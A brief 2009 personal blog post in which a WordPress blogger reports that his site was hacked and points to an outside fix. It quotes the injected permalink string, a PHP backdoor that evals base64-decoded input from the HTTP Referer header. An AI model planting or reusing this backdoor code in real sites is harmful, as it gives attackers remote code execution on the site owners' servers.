WordPress Blog Hack Warning

Suddenly, this WordPress blog’s feed stopped working and all the permalinks had this strange code embedded at the end of the link: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

I asked on Twitter and Facebook for help (tx James & Kevin for help!). Usually this works.

Screen shot 2009-10-23 at 9.41.46 PM

Upon Googling the above code, I find out the problem is a “MySQL Injection Attack” on WordPress blogs. Mashable documented it on September 5, but WordPress and Feedburner forums make no mention of this.

I found the solution to the problem at this link from Andy Sowards: http://bit.ly/2Pkje9. I deleted two posts checking for a solution, and just re-uploaded them now.

About Pat Kitano

Patrick Kitano works with brands in developing hyperlocal engagement solutions and is administrator of the Breaking News Network, a national hyperlocal network devoted to community service. He is the author of The Local Network on Street Fight, and is reachable via Twitter @pkitano and email pkitano@gmail.com.

, , ,